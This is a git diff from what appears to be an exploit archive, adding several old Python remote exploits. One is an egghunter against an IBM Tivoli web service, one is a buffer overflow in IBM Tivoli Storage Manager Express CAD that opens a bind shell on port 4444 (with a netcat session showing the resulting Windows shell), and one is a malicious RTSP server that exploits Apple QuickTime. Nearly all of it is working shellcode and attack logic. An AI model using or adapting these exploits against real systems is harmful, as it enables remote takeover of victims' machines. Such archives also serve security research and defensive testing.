+ print "[*] muts@offensive-security.com"
+
+if len(sys.argv)!=2:
+ banner()
+ print "[*] Usage: ibm-ti-pro.py \n"
+ sys.exit(0)
+
+#77E0211B FFD4 CALL ESP Win2k SP0
+banner()
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect ( ( sys.argv[1], 8080 ) )
+
+# Payload #1
+sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+# Payload #2
+# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
+
+bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
+"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
+"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
+"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
+"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
+"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
+"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
+"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
+"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
+"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
+"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
+"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
+"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
+"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
+"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" +"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" +"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" +"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" +"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" +"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" +"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" +"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" +"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" +"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" +"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" +"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" +"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" +"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" +"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" +"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" +"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" +"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" +"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" +"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" +"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" +"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" +"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" +"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" +"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") + +print "[*] Sending evil payload to "+sys.argv[1] +":8080" +expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n') +print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell" +print "[*] Happy Hunting!" 
+expl.close()
+
+# milw0rm.com [2007-06-03]
diff --git a/platforms/windows/remote/4573.py b/platforms/windows/remote/4573.py
index 6170ef1e9..707ba1a46 100755
--- a/platforms/windows/remote/4573.py
+++ b/platforms/windows/remote/4573.py
@@ -1,100 +1,100 @@ -#!/usr/bin/python -# -# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3) -# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html -# Tested on windows 2003 server SP0. -# Coded by Mati Aharoni -# muts.at.offensive-security.com -# http://www.offensive-security.com/0day/dsmcad.py.txt -# -# bt ~ # ./dsmcad.py 192.168.1.107 -# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow -# [*] http://www.offensive-security.com -# [*] Connecting to 192.168.1.107 -# [*] Sending evil buffer, ph33r -# [*] Check port 4444 for bindshell -# -# bt ~ # nc -v 192.168.1.107 4444 -# 192.168.1.107: inverse host lookup failed: Unknown host -# (UNKNOWN) [192.168.1.107] 4444 (krb524) open -# Microsoft Windows [Version 5.2.3790] -# (C) Copyright 1985-2003 Microsoft Corp. -# -# E:\Program Files\Tivoli\TSM\baclient> - -import socket -import sys - -print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow" -print "[*] http://www.offensive-security.com" - -def usage(): - print "[*] Usage: ./dsmcad.py " - sys.exit(1) - -if len(sys.argv) != 2: - usage() - -buffer="BirdsflyinghighyouknowhowIfeel" -buffer+="SunintheskyyouknowhowIfeel" -buffer+="ReeedsdriftinonbyyouknowhowIfeel" -buffer+="ItsanewdawnItsanewdayItsanewlifeForme" -buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme" - -buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN -buffer+="\x90"*4 -buffer+=( -# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" -"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32" -"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31" -"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33" -"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c" 
-"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65" -"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75" -"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c" -"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b" -"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a" -"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64" -"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66" -"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57" -"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54" -"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73" -"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b" -"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63" -"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58" -"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f" -"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73" -"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e" -"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42" -"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71" -"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41" -"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62" -"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c" -"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49" -"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b" -"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e" -"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a" -"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72" -"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76" -"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37" -"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30" 
-"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e" -"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30" -"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76" -"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68" -"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e" -"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46" -"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b" -"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b" -"\x4f\x48\x56\x49\x6f\x48\x50\x61") -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -print "[*] Connecting to "+sys.argv[1] -expl.connect ( ( sys.argv[1], 1581 ) ) -print "[*] Sending evil buffer, ph33r" -expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n') -expl.close() -print "[*] Check port 4444 for bindshell" - -# milw0rm.com [2007-10-27] +#!/usr/bin/python +# +# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3) +# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html +# Tested on windows 2003 server SP0. +# Coded by Mati Aharoni +# muts.at.offensive-security.com +# http://www.offensive-security.com/0day/dsmcad.py.txt +# +# bt ~ # ./dsmcad.py 192.168.1.107 +# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow +# [*] http://www.offensive-security.com +# [*] Connecting to 192.168.1.107 +# [*] Sending evil buffer, ph33r +# [*] Check port 4444 for bindshell +# +# bt ~ # nc -v 192.168.1.107 4444 +# 192.168.1.107: inverse host lookup failed: Unknown host +# (UNKNOWN) [192.168.1.107] 4444 (krb524) open +# Microsoft Windows [Version 5.2.3790] +# (C) Copyright 1985-2003 Microsoft Corp. 
+# +# E:\Program Files\Tivoli\TSM\baclient> + +import socket +import sys + +print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow" +print "[*] http://www.offensive-security.com" + +def usage(): + print "[*] Usage: ./dsmcad.py " + sys.exit(1) + +if len(sys.argv) != 2: + usage() + +buffer="BirdsflyinghighyouknowhowIfeel" +buffer+="SunintheskyyouknowhowIfeel" +buffer+="ReeedsdriftinonbyyouknowhowIfeel" +buffer+="ItsanewdawnItsanewdayItsanewlifeForme" +buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme" + +buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN +buffer+="\x90"*4 +buffer+=( +# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49" +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" +"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32" +"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31" +"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33" +"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c" +"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65" +"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75" +"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c" +"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b" +"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a" +"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64" +"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66" +"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57" +"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54" +"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73" +"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b" +"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63" 
+"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58" +"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f" +"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73" +"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e" +"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42" +"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71" +"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41" +"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62" +"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c" +"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49" +"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b" +"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e" +"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a" +"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72" +"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76" +"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37" +"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30" +"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e" +"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30" +"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76" +"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68" +"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e" +"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46" +"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b" +"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b" +"\x4f\x48\x56\x49\x6f\x48\x50\x61") +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +print "[*] Connecting to "+sys.argv[1] +expl.connect ( ( sys.argv[1], 1581 ) ) +print "[*] Sending evil buffer, ph33r" +expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n') 
+expl.close() +print "[*] Check port 4444 for bindshell" + +# milw0rm.com [2007-10-27] diff --git a/platforms/windows/remote/4657.py b/platforms/windows/remote/4657.py index a4c52e7f1..722c38ce3 100755 --- a/platforms/windows/remote/4657.py +++ b/platforms/windows/remote/4657.py 
@@ -1,125 +1,125 @@ -#!/usr/bin/python -########################################################################## -# http://www.offensive-security.com -# Bug discovered by Krystian Kloskowski (h07) -# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista -# This exploit is completely "Universal" .... It has also been modded to work via url redirection ... -# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera.... -# re-edited by muts and javaguru1999 to annoy Symantec -# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html -# there IS NO SPOON! -########################################################################## -# "With Internet Explorer versions 6 and 7, and the Safari 3 beta, -# the attack appears to be prevented because standard buffer overflow -# prevention processes act before any damage can be done, Florio wrote. -# With Firefox, the QuickTime RTSP response is unmoderated. As a result, -# the exploit works against Firefox if QuickTime is the default multimedia player, -# according to Florio." -########################################################################## -# Calling Quicktime via URL kicks in an Extra Exception Handler, -# of which we have no control over. -# By making the buffer larger than the original exploit, we can overwrite -# the last exception handler, and regain control over execution. -# This is indeed an evil exploit - muhaha. 
-########################################################################## - -from socket import * - -header = ( -'RTSP/1.0 200 OK\r\n' -'CSeq: 1\r\n' -'Date: 0x00 :P\r\n' -'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' -'Content-Type: %s\r\n' # <-- overflow -'Content-Length: %d\r\n' -'\r\n') - -body = ( -'v=0\r\n' -'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' -'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'i=1.mp3\r\n' -'t=0 0\r\n' -'a=tool:ciamciaramcia\r\n' -'a=type:broadcast\r\n' -'a=control:*\r\n' -'a=range:npt=0-213.077\r\n' -'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'a=x-qt-text-inf:1.mp3\r\n' -'m=audio 0 RTP/AVP 14\r\n' -'c=IN IP4 0.0.0.0\r\n' -'a=control:track1\r\n' -) - -# ExitProcess shellcode will kill browser, but keep the shell open - -shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41" -"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61" -"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53" -"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e" -"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46" -"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50" -"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b" -"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b" -"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69" -"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36" -"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44" -"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56" -"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74" -"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53" 
-"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a" -"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71" -"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78" -"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f" -"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32" -"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c" -"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33" -"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51" -"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51" -"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41" -"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e" -"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39" -"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b" -"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e" -"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38" -"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31" -"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46" -"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30" -"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73" -"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e" -"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32" -"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30" -"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e" -"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58" -"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41" -"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b" -"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b" -"\x4f\x48\x56\x69\x6f\x6a\x70\x42") - -tmp = "A" * 987 -tmp +="\xeb\x20\x90\x90" # short jump for 7.2 -tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop 
ret for 7.2 / short jump for 7.3 -tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3 -tmp += "\x90" * 92 -tmp += shellcode -tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions. - -header %= (tmp, len(body)) -evil = header + body - -s = socket(AF_INET, SOCK_STREAM) -s.bind(("0.0.0.0", 554)) -s.listen(1) -print "[+] Listening on [RTSP] 554" -c, addr = s.accept() -print "[+] Connection accepted from: %s" % (addr[0]) -c.recv(1024) -c.send(evil) -raw_input("[+] Done, press enter to quit") -c.close() -s.close() - -# milw0rm.com [2007-11-26] +#!/usr/bin/python +########################################################################## +# http://www.offensive-security.com +# Bug discovered by Krystian Kloskowski (h07) +# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista +# This exploit is completely "Universal" .... It has also been modded to work via url redirection ... +# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera.... +# re-edited by muts and javaguru1999 to annoy Symantec +# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html +# there IS NO SPOON! +########################################################################## +# "With Internet Explorer versions 6 and 7, and the Safari 3 beta, +# the attack appears to be prevented because standard buffer overflow +# prevention processes act before any damage can be done, Florio wrote. +# With Firefox, the QuickTime RTSP response is unmoderated. As a result, +# the exploit works against Firefox if QuickTime is the default multimedia player, +# according to Florio." +########################################################################## +# Calling Quicktime via URL kicks in an Extra Exception Handler, +# of which we have no control over. +# By making the buffer larger than the original exploit, we can overwrite +# the last exception handler, and regain control over execution. 
